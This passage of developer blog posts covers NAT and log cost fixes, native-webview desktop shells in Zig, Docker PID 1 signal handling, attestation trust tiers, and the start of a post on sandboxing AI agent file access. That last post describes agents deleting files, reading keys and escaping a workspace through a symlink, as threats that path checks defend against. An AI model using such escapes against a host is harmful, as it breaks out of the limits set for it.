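def monthly_nat_processing_cost(gb_per_day, usd_per_gb=0.045, days=30):
    """Estimate NAT data processing charges; usd_per_gb is an assumed rate."""
    return gb_per_day * usd_per_gb * days


estimate = monthly_nat_processing_cost(400)  # the 400GB/day ECS task
```

Under that assumed rate, 400GB a day works out to roughly $540 a month for traffic that never needed to touch the NAT.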

Step 3: Fix the actual problem

For the S3-via-NAT issue, the fix is a gateway VPC endpoint. It's free, takes about two minutes to create, and stops the bleeding immediately:

# Terraform example for a gateway endpoint
resource "aws_vpc_endpoint" "s3" {
  vpc_id       = aws_vpc.main.id
  service_name = "com.amazonaws.us-east-1.s3"

  # Attach to your private route tables so traffic to S3
  # bypasses the NAT gateway entirely
  route_table_ids = [
    aws_route_table.private_a.id,
    aws_route_table.private_b.id,
  ]

  vpc_endpoint_type = "Gateway"
}

For cross-AZ chatter, you have a few options depending on the workload:

Use topology-aware service discovery so clients prefer same-AZ targets
For Kafka or similar, configure rack awareness
For databases, run read replicas in each AZ and route reads locally
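The first option boils down to sorting candidates so same-AZ targets get tried first. A minimal sketch, assuming each target is a dict with a hypothetical "az" key supplied by your service registry:

```python
def order_targets(targets, local_az):
    """Same-AZ targets first; original order is kept within each group."""
    # sorted() is stable, and False sorts before True.
    return sorted(targets, key=lambda target: target["az"] != local_az)


targets = [
    {"host": "a", "az": "us-east-1b"},
    {"host": "b", "az": "us-east-1a"},
    {"host": "c", "az": "us-east-1a"},
]
```

Cross-AZ targets stay in the list as fallbacks, so you keep the availability benefit and only pay for cross-AZ traffic when the local targets are unavailable.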

For log ingestion costs, audit your log levels. I once found a service logging the entire request body at INFO level. After dropping it to DEBUG and sampling 1% of requests, our log bill dropped 80%.
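Sampling is easy to bolt onto Python's standard logging module. This is a sketch of one way to do it, not what that service actually ran: it samples individual log records rather than whole requests, and SampleFilter is a name I made up.

```python
import logging
import random


class SampleFilter(logging.Filter):
    """Keep a fraction of records below WARNING; never drop WARNING and above."""

    def __init__(self, rate, rng=None):
        super().__init__()
        self.rate = rate
        # An injectable RNG keeps the filter testable.
        self.rng = rng or random.Random()

    def filter(self, record):
        if record.levelno >= logging.WARNING:
            return True
        return self.rng.random() < self.rate
```

Attach it with handler.addFilter(SampleFilter(0.01)) to keep about 1% of the noisy records while errors still always get through.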

Step 4: Set up guardrails so it doesn't happen again

The fix is only half the job. Without monitoring, you'll be back here in six months for a different reason.

I set up budget alerts at multiple thresholds, but more importantly, I set up anomaly detection on usage types. A 50% increase in NAT gateway bytes overnight is the kind of signal you want a page for, not a monthly summary.

Here's a CloudWatch alarm pattern I use:

# Pseudo-code for the alarm logic
if current_hour_nat_bytes > (baseline_avg * 2):
    # Page on-call, not just email
    # The bill is already being generated
    trigger_pagerduty_alert()
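The same check as a runnable function, if you want to unit test the threshold before wiring it to a pager. The function name and the choice of a plain mean over recent hours as the baseline are my assumptions:

```python
from statistics import mean


def should_page(current_bytes, recent_hourly_bytes, multiplier=2.0):
    """True when the current hour exceeds multiplier times the recent average."""
    if not recent_hourly_bytes:
        return False  # no baseline yet, so don't page on the first data point
    return current_bytes > mean(recent_hourly_bytes) * multiplier
```

A plain mean is crude. If your traffic has strong daily cycles, comparing against the same hour on previous days will give fewer false pages.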

I also run a weekly cron job that lists every load balancer, elastic IP, and EBS volume in the account, cross-references against what's actually in use, and posts a report to Slack. It takes about 50 lines of Python and has caught at least four forgotten resources in the last year.
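The cross-referencing part is the core of that script. Here's a sketch covering elastic IPs and EBS volumes, assuming the inputs are the "Addresses" and "Volumes" lists from the EC2 describe calls. The function name is hypothetical, and this is not my actual script.

```python
def find_idle_resources(addresses, volumes):
    """Return elastic IPs with no association and volumes not attached to anything."""
    # An address that isn't associated with anything has no AssociationId key.
    idle_ips = [a["PublicIp"] for a in addresses if "AssociationId" not in a]
    # An unattached EBS volume reports its state as "available".
    idle_volumes = [v["VolumeId"] for v in volumes if v["State"] == "available"]
    return {"elastic_ips": idle_ips, "volumes": idle_volumes}
```

Keeping the AWS calls outside this function means the logic can be tested with plain dicts.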

Prevention tips that actually work

A few things I've learned the expensive way:

Tag everything at creation time. If you can't answer "who owns this resource?" in 10 seconds, you can't manage costs. I enforce this with SCPs that block resource creation without specific tags.
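Treat NAT gateways as expensive by default. Any service that talks to AWS APIs should go through a VPC endpoint. S3 and DynamoDB have gateway endpoints, which are free. SQS, Secrets Manager, and most other services use interface endpoints, which bill per hour and per GB, so check that the endpoint is cheaper than the NAT traffic it replaces.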
Set log retention explicitly. The default "never expire" is a silent budget killer. 30 days is fine for most things; if you need longer, archive to S3 with lifecycle rules to Glacier.
Review your reserved capacity quarterly. Workloads shift. Reservations you bought 18 months ago might not match current usage at all.
Run a cost game day. Once a quarter, pretend the bill doubled and trace where it could have come from. You'll find problems before they become real.

The bigger lesson

Cloud costs aren't really an infrastructure problem — they're an observability problem. You can't fix what you can't see, and most teams aren't watching the right signals.

The services that cost you money quietly are the ones designed to scale invisibly. That's a feature most of the time. But when it breaks, it breaks expensively. Build the visibility before you need it, and these 3 AM pages get a lot less common.

Why cross-platform desktop apps balloon to 200MB and how to slim them down

Alan West — Mon, 11 May 2026 14:03:39 GMT

The 200MB "Hello World"

I shipped my first cross-platform desktop app back in 2018. Markdown editor. Three buttons, a text area, syntax highlighting. The final installer was 187MB.

Every time I open Activity Monitor during dev work, I see a handful of Electron-based apps each parked at 300MB. That's well over a gigabyte of RAM for tools I'm not even actively using. A chat client, a code editor, a git GUI, a note-taker. The math finally caught up with me last month, and I started digging into what it would actually take to ship a desktop app that doesn't melt your laptop.

This post is about the root cause of that bloat and the path I've been walking to fix it. There's no magic, just a different architectural choice that systems languages like Zig and Rust have made cheap to take.

Root cause: every app ships its own browser

The popular bundler-based desktop frameworks all follow the same recipe: ship Chromium plus a Node.js runtime alongside your app, then load your HTML/CSS/JS inside it.

The catch is that "bundle Chromium" means a full Chromium. Not a stripped rendering engine. The whole browser, including:

V8 JavaScript engine
Blink rendering engine
A separate Node.js runtime alongside the renderer
Media codecs, sandboxing layers, GPU process, the lot

Five of those apps running = five copies of Chromium in memory. None of them share processes. None of them benefit when your OS gets a faster, more secure browser shipped by the vendor.

And it's not just RAM. Disk space, code-signing time, auto-update bandwidth, startup latency — they all scale with the runtime. You're paying for a browser you don't use.

The native webview approach

Every modern OS already exposes a system webview component:

Windows: WebView2, built on Edge (docs)
macOS / iOS: WKWebView, built on WebKit (docs)
Linux: WebKitGTK (docs)
Android: the platform WebView

These components are already loaded for other apps. Use them and your app doesn't ship a browser at all — it borrows one.

The trade-off: there's no unified API across platforms. You need a thin native shell that creates a window, embeds the OS webview into it, wires up message passing between native and JS, and exposes whatever OS APIs your app needs.

This is the part where systems languages with clean C interop become useful. The shell stays tiny because you're not implementing a browser — you're calling four or five C functions per platform. Zig fits this particularly well because its @cImport lets you pull in system headers directly without a binding-generation step.

Step 1: spawn a window with a webview

Here's the rough shape of the macOS shell in Zig. I'm using @cImport to grab the Objective-C runtime and message it directly. WebKit's classes are reachable the same way:

const std = @import("std");
const objc = @cImport({
    @cInclude("objc/objc.h");
    @cInclude("objc/message.h");
});

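// Helper that wraps objc_msgSend with the right calling convention.
// objc_msgSend is variadic in C but we need typed Zig wrappers per signature.
// This one covers the "no arguments, returns an object" shape used below.
// (Newer Zig releases spell the calling convention as .c instead of .C.)
fn msgSend(target: ?*anyopaque, selector: objc.SEL) ?*anyopaque {
    const Fn = *const fn (?*anyopaque, objc.SEL) callconv(.C) ?*anyopaque;
    const typed: Fn = @ptrCast(&objc.objc_msgSend);
    return typed(target, selector);
}

fn cls(name: [:0]const u8) ?*anyopaque {
    return objc.objc_getClass(name.ptr);
}

fn sel(name: [:0]const u8) objc.SEL {
    return objc.sel_registerName(name.ptr);
}

pub fn run(url: [:0]const u8) !void {
    const NSApplication = cls("NSApplication").?;
    const app = msgSend(NSApplication, sel("sharedApplication"));

    // ... allocate NSWindow, attach WKWebView, navigate to url ...
    _ = url; // consumed by the elided WKWebView setup

    _ = msgSend(app, sel("run")); // Blocking event loop
}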

I left the WKWebView setup out because the post would balloon, but the pattern is mechanical. The full shell for one platform fits in a few hundred lines.

Step 2: IPC between native and JS

The webview exposes a message channel in both directions. On WKWebView, JS calls window.webkit.messageHandlers.<name>.postMessage(...), where <name> is whatever handler name the native side registered, and your native code receives a callback. On WebView2 it's window.chrome.webview.postMessage(...). The shell normalizes these so the page sees one API.

Here's a small request/response wrapper I use on the JS side. Each call gets a UUID so replies can be routed back to the right promise:

// Injected once at page load by the native shell
window.__pending = new Map();

function callNative(method, params) {
  const id = crypto.randomUUID();
  return new Promise((resolve, reject) => {
    window.__pending.set(id, { resolve, reject });
    // bridge is the platform-specific postMessage hook
    window.bridge.postMessage(JSON.stringify({ id, method, params }));
  });
}

// Native side calls this back with { id, ok, value } once the work is done
window.__resolveNative = ({ id, ok, value }) => {
  const pending = window.__pending.get(id);
  if (!pending) return;
  window.__pending.delete(id);
  ok ? pending.resolve(value) : pending.reject(new Error(value));
};

Step 3: put types on top

Raw string messages get painful fast. A small typed RPC layer on the TS side keeps things sane:

// Single source of truth for the bridge surface
interface NativeAPI {
  'fs.readDir':  (p: { path: string }) => Promise<string[]>;
  'fs.readFile': (p: { path: string }) => Promise<string>;
  'window.minimize': () => Promise<void>;
}

// Generic helper that preserves param + return types per method name
function rpc<K extends keyof NativeAPI>(
  method: K,
  params: Parameters<NativeAPI[K]>[0],
): ReturnType<NativeAPI[K]> {
  return callNative(method, params) as ReturnType<NativeAPI[K]>;
}

const files = await rpc('fs.readDir', { path: '~/Documents' });

Mirror that interface in the native dispatcher and the compiler catches typos on both sides.
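For the shape of that dispatcher, here's a language-neutral sketch in Python. A real shell would write this in Zig or whatever the shell is built in. The HANDLERS table and the function names are hypothetical; the reply shape matches what window.__resolveNative expects.

```python
import json
import os


def _read_dir(params):
    """Handler for 'fs.readDir': list entry names in a directory."""
    return sorted(os.listdir(params["path"]))


# Method name -> handler. Mirrors the keys of the NativeAPI interface.
HANDLERS = {"fs.readDir": _read_dir}


def dispatch(raw_message):
    """Decode one bridge message and build the JSON reply for the page."""
    request = json.loads(raw_message)
    request_id = request["id"]
    handler = HANDLERS.get(request["method"])
    if handler is None:
        error = "unknown method: " + request["method"]
        return json.dumps({"id": request_id, "ok": False, "value": error})
    try:
        value = handler(request.get("params") or {})
        return json.dumps({"id": request_id, "ok": True, "value": value})
    except Exception as exc:  # report any failure back to the JS promise
        return json.dumps({"id": request_id, "ok": False, "value": str(exc)})
```

The important property is that every request gets exactly one reply carrying the same id, including on failure. Otherwise promises on the JS side hang forever.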

What you actually save

In a side-by-side I ran with a small clipboard manager last month:

Chromium-bundled version: ~142MB installed, ~180MB RAM at idle
Native-webview version: ~6MB installed, ~35MB RAM at idle

The 35MB is mostly the webview process the OS is already running. Subsequent webview-based apps add roughly 10–15MB each because they share the system component.
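Extrapolating those numbers to the five-app scenario from earlier gives a feel for the gap. This is arithmetic on my clipboard-manager figures, not a measurement, and it assumes every app looks like that one:

```python
def bundled_total_mb(apps, per_app_mb=180):
    """Each bundled app carries its own full runtime."""
    return apps * per_app_mb


def shared_webview_total_mb(apps, first_app_mb=35, extra_app_mb=15):
    """First app pays for the webview process; later apps add a smaller increment."""
    if apps == 0:
        return 0
    return first_app_mb + (apps - 1) * extra_app_mb


bundled = bundled_total_mb(5)        # 5 * 180 = 900
shared = shared_webview_total_mb(5)  # 35 + 4 * 15 = 95
```

Using the upper end of the 10–15MB range, that's about 900MB versus about 95MB at idle.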

Prevention tips

If you're starting a new desktop or hybrid mobile app, here's what I'd weigh:

Audit what you actually need from the renderer. DRM, specific codecs, Chromium-only DevTools features — those will push you back to the bundled approach. Otherwise you're paying for capabilities you don't ship.
Treat the native shell as a port boundary. Keep it tiny. All business logic stays in JS or in clearly-scoped native modules. The shell should do windows, IPC, and OS APIs — nothing else.
Read existing open-source shells before you write your own. Tauri (Rust) and Wails (Go) both expose their shells as readable references. The patterns transfer to a Zig shell cleanly even if you don't use those projects directly.
Test on the slowest target machine you can find. WebKitGTK on a budget Linux box behaves nothing like WKWebView on Apple silicon. The differences are mostly in CSS edge cases and JS engine quirks, and you want to know about them before users do.
Don't pretend it's a free lunch. You'll write more native code than you would with the bundled-runtime approach. You'll juggle three slightly different webview APIs. The win is real, but it has a cost.

For most apps — most of them, honestly — the trade is worth it. Users get faster startup. Laptops stay cooler. Installers stop being half a gigabyte. The shell stays a few hundred lines per platform, which is something one person can actually own.

Why Your Docker Containers Refuse to Die: The PID 1 Problem

Alan West — Mon, 11 May 2026 00:21:05 GMT

You hit docker stop. Nothing happens. You wait ten seconds. Docker eventually sends SIGKILL. The container disappears, but only after a frustrating timeout. Your CI pipeline is slower than it should be, your Kubernetes pod terminations are sluggish, and you have a vague feeling something is wrong.

I hit this exact issue last month while debugging a deployment that took 90 seconds to roll out a single replica. Turned out to be the same boring culprit I've seen on at least four other projects: the PID 1 problem.

Let me walk you through what's actually happening, why it bites so many teams, and how to fix it properly.

The frustrating symptom

Here's what it usually looks like. You've got a Node app, a Python service, or whatever. You build it, run it, and try to stop it:

docker run --name myapp -d my-image:latest
# ... later ...
time docker stop myapp
# real 0m10.234s

Ten seconds. Every. Single. Time. That's the default --time value before Docker gives up and sends SIGKILL. If you're orchestrating dozens of containers, this adds up fast.

Worse, in production, this means your rolling deploys are slow, your zero-downtime story is shaky, and any in-flight requests are getting cut off ungracefully because your app never had a chance to clean up.

The root cause: PID 1 is weird

Here's the part most tutorials skip. In Linux, the process with PID 1 has special status. It's the init process. The kernel treats it differently in two important ways:

It does not get the default signal handlers. If you send SIGTERM to PID 1, and the process has no explicit handler for it, the signal is ignored. This is a kernel-level protection meant to keep init from being killed accidentally.
It is responsible for reaping zombie child processes. When any process in the system has its parent die, it gets re-parented to PID 1. When those orphans eventually exit, PID 1 must call wait() on them or they become zombies forever.

Now, in a Docker container, your application process is PID 1. So if your Node script doesn't explicitly handle SIGTERM, Docker's stop signal goes nowhere. The kernel quietly drops it. Docker waits its timeout, then nukes you with SIGKILL.

You can confirm this is happening with a quick test:

# Inside a running container
ps -ef
# UID PID PPID CMD
# root 1 0 node server.js

That 1 next to your app is the problem.

The proof, in one tiny example

Let me show you the bug in the smallest possible repro. Save this as app.js:

// No SIGTERM handler
setInterval(() => console.log('alive'), 1000);

And a Dockerfile:

FROM node:20-alpine
COPY app.js /app.js
CMD ["node", "/app.js"]

Build and run:

docker build -t pid1-demo .
docker run --name demo -d pid1-demo
time docker stop demo

You'll wait the full 10 seconds. Now compare with this:

// With SIGTERM handler
process.on('SIGTERM', () => {
  console.log('shutting down cleanly');
  process.exit(0);
});
setInterval(() => console.log('alive'), 1000);

Rebuild and stop. Instant. The container exits in well under a second because PID 1 now actually responds to the signal.

Fix #1: Handle signals in your app

The most correct fix is to handle SIGTERM (and usually SIGINT) in your application code. This is the right answer because your app probably needs to do cleanup anyway: drain HTTP connections, finish in-flight DB writes, flush logs.

For a Node HTTP server:

const http = require('http');

const server = http.createServer(handler); // handler is your request listener
server.listen(3000);

function shutdown() {
  console.log('SIGTERM received, draining...');
  // Stop accepting new connections, finish existing ones
  server.close(() => process.exit(0));
  // Hard stop if drain takes too long
  setTimeout(() => process.exit(1), 8000).unref();
}

process.on('SIGTERM', shutdown);
process.on('SIGINT', shutdown);

For Python with Flask/Gunicorn, Gunicorn already handles this for you. For a raw script:

import signal
import sys

def shutdown(signum, frame):
    print('cleaning up')
    sys.exit(0)

signal.signal(signal.SIGTERM, shutdown)
signal.signal(signal.SIGINT, shutdown)

Fix #2: Use a proper init process

Sometimes you can't modify the app, or you've got a shell script as your entrypoint that spawns multiple children. In that case, run a tiny init process as PID 1 and let it handle signals and zombie reaping.

The usual choice is tini, which is around 24KB and does exactly one thing well. Docker actually ships with built-in tini support via the --init flag:

docker run --init --name demo -d pid1-demo

That's it. Docker injects a small init binary as PID 1, your app becomes PID 2, signals get forwarded properly, and zombies get reaped.
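To make those two jobs concrete, here's a deliberately minimal Python sketch of what an init process does: start the real command as a child, forward stop signals to it, and reap whatever exits. It is an illustration only, not how tini is implemented, and it assumes a Unix-like system. The name run_as_init is mine.

```python
import os
import signal
import sys


def run_as_init(argv):
    """Run argv as a child, forward SIGTERM/SIGINT to it, and reap exited children."""
    child_pid = os.fork()
    if child_pid == 0:
        # Child: become the real application.
        try:
            os.execvp(argv[0], argv)
        finally:
            os._exit(127)  # only reached if exec failed

    def forward(signum, _frame):
        try:
            os.kill(child_pid, signum)
        except ProcessLookupError:
            pass  # child already gone

    previous = {s: signal.signal(s, forward) for s in (signal.SIGTERM, signal.SIGINT)}
    try:
        while True:
            # waitpid(-1) reaps any child, including orphans that get
            # re-parented to this process when it runs as PID 1.
            pid, status = os.waitpid(-1, 0)
            if pid != child_pid:
                continue  # reaped an orphan; keep waiting for the main child
            if os.WIFSIGNALED(status):
                return 128 + os.WTERMSIG(status)  # shell-style exit code
            return os.WEXITSTATUS(status)
    finally:
        # Put the original handlers back so callers aren't affected.
        for signum, handler in previous.items():
            signal.signal(signum, handler)
```

Because the wrapper installs explicit handlers, it responds to SIGTERM even as PID 1, and the app underneath gets the signal with normal default behavior because it is no longer PID 1.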

If you want it baked into the image instead of relying on the runtime flag:

FROM node:20-alpine
RUN apk add --no-cache tini
COPY app.js /app.js
# tini becomes PID 1 and execs your command as a child
ENTRYPOINT ["/sbin/tini", "--"]
CMD ["node", "/app.js"]

For Debian-based images, swap apk add for apt-get install -y tini and point ENTRYPOINT at /usr/bin/tini, which is where the Debian package puts the binary. There's also dumb-init, which does the same job with slightly different signal-forwarding behavior. Both are fine.

The shell-form CMD trap

One more gotcha. If you write your CMD in shell form, you actually get sh -c "..." as PID 1, not your app:

# Shell form: PID 1 is /bin/sh, NOT node
CMD node /app.js

# Exec form: PID 1 is node
CMD ["node", "/app.js"]

And sh makes a poor PID 1: it gets the same no-default-handler treatment, and while it waits on node it does not pass SIGTERM along to it. Always prefer exec form unless you genuinely need shell features. If you do need shell expansion, wrap it with exec:

CMD ["sh", "-c", "exec node /app.js"]

The exec replaces the shell process with node, so node still ends up as PID 1.

Prevention checklist

A few habits that have saved me a lot of debugging time:

Default to exec-form CMD and ENTRYPOINT. It's a one-line change that prevents an entire class of bugs.
Add --init or bake in tini for any image where you don't fully control the application's signal handling.
Test your shutdown path locally with time docker stop <container>. If it takes more than two or three seconds, something is wrong. Catch it before production does.
Set a sensible terminationGracePeriodSeconds in Kubernetes to match your app's actual drain time. Don't just leave it at the 30-second default and hope.
Log on SIGTERM receipt. When something goes wrong in production, you want to know whether the signal arrived at all or was silently dropped.

The meme version of this is: containers are easy, until they aren't. The boring reality is that Linux process semantics didn't change just because we put a thin namespace wrapper around them. PID 1 is special, signals are easy to drop, and zombies accumulate. Once you internalize that, half the weird container shutdown issues you'll ever see stop being mysterious.

How to handle hardware attestation without locking out real users

Alan West — Mon, 11 May 2026 00:05:05 GMT

Last month I got a bug report that made me close my laptop and go for a walk. A paying user couldn't log in. Their device was rooted? Not according to them. Custom ROM? Yes. A modern, security-hardened Android build with verified boot and hardware-backed keys. The kind of setup that's arguably more secure than a stock device.

My app rejected them anyway. Why? Because somewhere along the way, I had wired up the strictest integrity verdict I could find and called it a day. Classic mistake.

If you've shipped any mobile app that talks to a backend, you've probably run into the same trap. Let's dig into why hardware attestation locks out legitimate users, and what to actually do about it.

The frustrating problem

You add an integrity check to gate sensitive operations — login, payments, key recovery, whatever. The API gives you a verdict. You check the strongest tier. Ship it.

Then the support tickets roll in:

Users on alternative Android distributions can't authenticate
Users on older but perfectly functional devices get blocked
Users who happen to use a non-mainstream device manufacturer can't even sign up
Corporate users with managed devices fail randomly

And here's the kicker: the people getting blocked are often the most security-conscious users you have. They're running verified boot. Their keys live in a real TEE. The cryptographic chain is solid. But your app treats them like an attacker because a single boolean came back false.

Root cause: attestation isn't binary

Hardware attestation was designed to answer one question: "is this key stored in hardware that I trust?" That's it. A clean, useful primitive.

The problem is that platform-level integrity APIs bolt a lot of extra opinions on top:

Is the bootloader locked with a specific vendor's key?
Is the OS signed by a specific vendor?
Is this device on an approved allow-list?
Has the device passed a specific certification program?

These are policy decisions dressed up as security guarantees. A device can have rock-solid hardware-backed keys and fail these checks — because the checks aren't really about hardware security, they're about ecosystem control.

When your code does this:

// DON'T DO THIS
if (verdict.deviceIntegrity != STRONG_INTEGRITY) {
    return AuthResult.Rejected
}

You're not asking "can I trust this device's cryptographic operations?" You're asking "is this device on the vendor's preferred list?" Those are different questions, and conflating them is how you end up rejecting legitimate users.

Step-by-step solution

The fix is to build a tiered trust model. Treat attestation as one signal among many, and gate operations based on actual risk — not on a single boolean from a black box.

Step 1: Verify the key attestation chain yourself

Instead of relying solely on the platform's verdict, validate the hardware-backed key attestation directly. On Android this means parsing the X.509 certificate chain from a hardware-backed Keystore key and checking the attestation extension.

fun verifyKeyAttestation(certChain: List<X509Certificate>): AttestationResult {
    // Walk the chain back to a known root
    val root = certChain.last()
    if (!isKnownAttestationRoot(root)) {
        return AttestationResult.UnknownRoot
    }

    // The leaf cert contains the attestation extension (OID 1.3.6.1.4.1.11129.2.1.17)
    val leaf = certChain.first()
    val extension = leaf.getExtensionValue("1.3.6.1.4.1.11129.2.1.17")
        ?: return AttestationResult.NoAttestation

    val parsed = parseAttestationExtension(extension)

    // securityLevel tells us where the key actually lives
    return when (parsed.keymasterSecurityLevel) {
        SECURITY_LEVEL_STRONGBOX -> AttestationResult.StrongBox
        SECURITY_LEVEL_TRUSTED_ENVIRONMENT -> AttestationResult.Tee
        SECURITY_LEVEL_SOFTWARE -> AttestationResult.SoftwareOnly
        else -> AttestationResult.Unknown
    }
}

This tells you what you actually need to know: where the private key lives. A TEE-backed key is a TEE-backed key, regardless of which OS is running on top.

Google publishes the Android Keystore attestation root certificates for verification. Use those.
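One simple way to implement a check like isKnownAttestationRoot on a server is to pin SHA-256 fingerprints of the published roots. Here's a sketch in Python. The function names are mine and the pinned values must come from the roots you actually downloaded. Note that this only identifies the root; you still need to verify each signature in the chain with a proper X.509 library.

```python
import hashlib


def fingerprint(der_bytes):
    """SHA-256 fingerprint of a DER-encoded certificate, as lowercase hex."""
    return hashlib.sha256(der_bytes).hexdigest()


def is_known_attestation_root(root_der, pinned_fingerprints):
    """True if the chain's root certificate matches one of the pinned roots."""
    return fingerprint(root_der) in pinned_fingerprints
```

Keep the pinned set in config rather than code so you can add a new root without shipping a release.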

Step 2: Tier your operations by risk

Not every action needs maximum assurance. Build a matrix:

enum class TrustTier { Strong, Standard, Minimal }

fun requiredTier(operation: Operation): TrustTier = when (operation) {
    Operation.Login -> TrustTier.Standard
    Operation.ViewBalance -> TrustTier.Standard
    Operation.TransferUnderLimit -> TrustTier.Standard
    Operation.TransferOverLimit -> TrustTier.Strong
    Operation.ChangeRecoveryEmail -> TrustTier.Strong
    Operation.ReadOnlyPublicData -> TrustTier.Minimal
}

A user who can't pass Strong-tier checks should still be able to log in and see their account. They just hit step-up authentication for high-risk operations.
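The gate itself can be tiny. A sketch in Python of the step-up decision, assuming the tiers are ordered Minimal < Standard < Strong; the "step_up" outcome name is my own:

```python
from enum import IntEnum


class TrustTier(IntEnum):
    MINIMAL = 0
    STANDARD = 1
    STRONG = 2


def gate(required, achieved):
    """Allow when the session meets the tier; otherwise ask for step-up auth."""
    if achieved >= required:
        return "allow"
    return "step_up"
```

Note there is no "reject" branch. Falling short of a tier routes the user to a stronger check instead of a dead end.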

Step 3: Add server-side signal fusion

Device attestation is one input. On the server, combine it with everything else you know:

def assess_risk(session):
    score = 0

    # Attestation signal — graded, not binary
    if session.attestation == 'strongbox':
        score += 40
    elif session.attestation == 'tee':
        score += 30
    elif session.attestation == 'software':
        score += 10

    # Behavioral signals carry real weight
    if session.device_known_for_account(days=30):
        score += 25
    if session.ip_in_user_history():
        score += 15
    if session.geo_consistent_with_recent():
        score += 10

    # Negative signals
    if session.velocity_anomaly():
        score -= 30
    if session.is_known_bad_asn():
        score -= 20

    return score

A score above your threshold gets through. Below it, you challenge — TOTP, WebAuthn, email confirmation. You almost never need to hard-reject.
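Two worked examples using the weights above. The threshold of 60 is a number I picked for illustration; tune it against your own traffic.

```python
def decide(score, threshold=60):
    """Allow above the threshold, otherwise challenge. Never hard-reject here."""
    return "allow" if score > threshold else "challenge"


# Custom-ROM user with a TEE-backed key on a device, IP, and location we know:
tee_known_device = 30 + 25 + 15 + 10  # = 80

# Software-only key on a device we have never seen, no other positive signals:
software_new_device = 10
```

The custom-ROM user from the bug report sails through at 80, while the unknown software-only device gets a challenge instead of a rejection.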

Step 4: Use WebAuthn as your primary trust anchor

If you really care about phishing-resistant auth and device binding, the standardized answer is WebAuthn. It uses the same hardware-backed keys, gives you cryptographic proof of possession, and doesn't depend on a single vendor's integrity verdict.

// Client-side registration — relies on the platform authenticator's hardware
const credential = await navigator.credentials.create({
  publicKey: {
    challenge: serverChallenge,
    rp: { name: 'My App' },
    user: { id: userId, name: email, displayName: name },
    pubKeyCredParams: [{ type: 'public-key', alg: -7 }], // ES256
    authenticatorSelection: {
      authenticatorAttachment: 'platform',
      userVerification: 'required',
      residentKey: 'preferred',
    },
    // attestation: 'none' is fine for most apps — you get the hardware binding
    // without locking out users whose attestation cert isn't on an allow-list
    attestation: 'none',
  },
});

Using attestation: 'none' is the key detail. You still get hardware-backed key storage and the phishing-resistance benefits. You just don't gate on a specific vendor's signature being present.
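The serverChallenge in that snippet has to come from somewhere. Here's a sketch of the server half in Python: random bytes, stored per session, usable exactly once. The ChallengeStore class is hypothetical, and in production I'd lean on a maintained WebAuthn server library rather than hand-rolling verification.

```python
import base64
import secrets


def to_base64url(data):
    """Encode bytes as unpadded base64url for transport to the browser."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


class ChallengeStore:
    """In-memory single-use challenges, keyed by session id (sketch only)."""

    def __init__(self):
        self._pending = {}

    def issue(self, session_id, num_bytes=32):
        challenge = secrets.token_bytes(num_bytes)
        self._pending[session_id] = challenge
        return challenge

    def consume(self, session_id, presented):
        # pop() makes the challenge single-use, which blocks replays.
        expected = self._pending.pop(session_id, None)
        if expected is None:
            return False
        return secrets.compare_digest(expected, presented)
```

A real deployment would also expire challenges after a short time and keep them somewhere shared, not in process memory.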

Prevention tips

A few habits that save you from this whole class of bug:

Log every attestation rejection with full context. When users complain, you need to see exactly which signal failed and what their device looked like.
Test on at least one non-stock device. Borrow one if you have to. The bug you'll find is almost always real.
Document your trust model explicitly. Write down which operations need which tier and why. Future-you will rip out a lot of the gates once you see them in writing.
Never put the integrity check in the critical login path without a fallback. A vendor API outage shouldn't lock out 100% of your users.
Treat attestation verdicts as advisory, not authoritative. The actual question is "do I have enough confidence to permit this specific action?" — that's a server-side judgment call, not a client-side boolean.

The deeper lesson here is that security and ecosystem control got entangled, and we shipped libraries that conflate them. As app developers we don't have to play along. The cryptographic primitives — hardware-backed keys, attestation chains, WebAuthn — work fine on their own. Use those directly, and you get real security without telling your most careful users to go away.

Sandboxing AI Agent Filesystems: Containers vs Virtual FS Layers

Alan West — Sun, 10 May 2026 20:08:41 GMT

If you've ever wired up an AI agent to do real work, you've probably hit the same wall I did: filesystem access is a minefield. Give it too much rope and it'll happily rm -rf something important. Lock it down too hard and it can't actually do anything useful.

I've been bouncing between three approaches over the last year — raw FS access with allowlists, container-based isolation, and most recently a virtual filesystem layer. Each has real tradeoffs. The trending strukto-ai/mirage project pitches itself as a unified virtual filesystem for AI agents, which got me thinking about when this approach actually makes sense versus the alternatives. I'll be honest up front: I've only skimmed Mirage's repo and poked at the examples, so treat my notes on it as provisional rather than a deep review.

Why this is harder than it looks

When a coding agent says "read this file," what should that actually do? In a naive setup, the agent process can read anything the host user can read. That's fine for a throwaway VM. It's terrifying on a dev laptop with SSH keys and tokens sitting around.

The three things I want from any FS access layer:

Bounded blast radius — the agent can't escape its assigned working set
Reversibility — I can review and roll back changes before they hit disk for real
Predictable paths — the agent sees the same paths whether it's running locally, in CI, or on a remote sandbox

Most setups give you one or two of these. Getting all three is where the design choices get interesting.

Approach 1: Raw FS with allowlists

This is the baseline. You hand the agent a working directory and trust it to behave.

# Naive approach: agent gets a working dir, full access inside it
from pathlib import Path

WORK_DIR = Path("/tmp/agent-workspace").resolve()

def safe_read(rel_path: str) -> str:
    # Re-resolve every call to defeat symlink shenanigans
    target = (WORK_DIR / rel_path).resolve()
    if not target.is_relative_to(WORK_DIR):
        raise PermissionError("path escapes workspace")
    return target.read_text()

def safe_write(rel_path: str, content: str) -> None:
    target = (WORK_DIR / rel_path).resolve()
    if not target.is_relative_to(WORK_DIR):
        raise PermissionError("path escapes workspace")
    target.write_text(content)

Where this works: quick experiments, throwaway scripts, anything where the workspace is already disposable.

Where it falls over: symlinks (an agent that creates link -> /etc and then writes through it can slip past a sloppy check), TOCTOU races, and the simple fact that "undo the last 30 minutes of agent work" becomes a git stash scavenger hunt.
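Here's a small reproduction of the symlink case, showing that the resolve-then-check pattern catches it. It's a sketch with a parameterized workspace (the function names are mine) and it does nothing about the TOCTOU race: a link created between the check and the write can still slip through.

```python
import tempfile
from pathlib import Path


def resolve_inside(workspace, rel_path):
    """Resolve rel_path under workspace, refusing anything that lands outside it."""
    root = workspace.resolve()
    target = (root / rel_path).resolve()  # follows symlinks on existing components
    if not target.is_relative_to(root):
        raise PermissionError(f"path escapes workspace: {rel_path}")
    return target


def demo_symlink_escape():
    """Create workspace/link -> ../outside and try to write through it."""
    with tempfile.TemporaryDirectory() as tmp:
        workspace = Path(tmp) / "workspace"
        outside = Path(tmp) / "outside"
        workspace.mkdir()
        outside.mkdir()
        (workspace / "link").symlink_to(outside, target_is_directory=True)
        try:
            resolve_inside(workspace, "link/secret.txt")
        except PermissionError:
            return True  # the escape was caught
        return False
```

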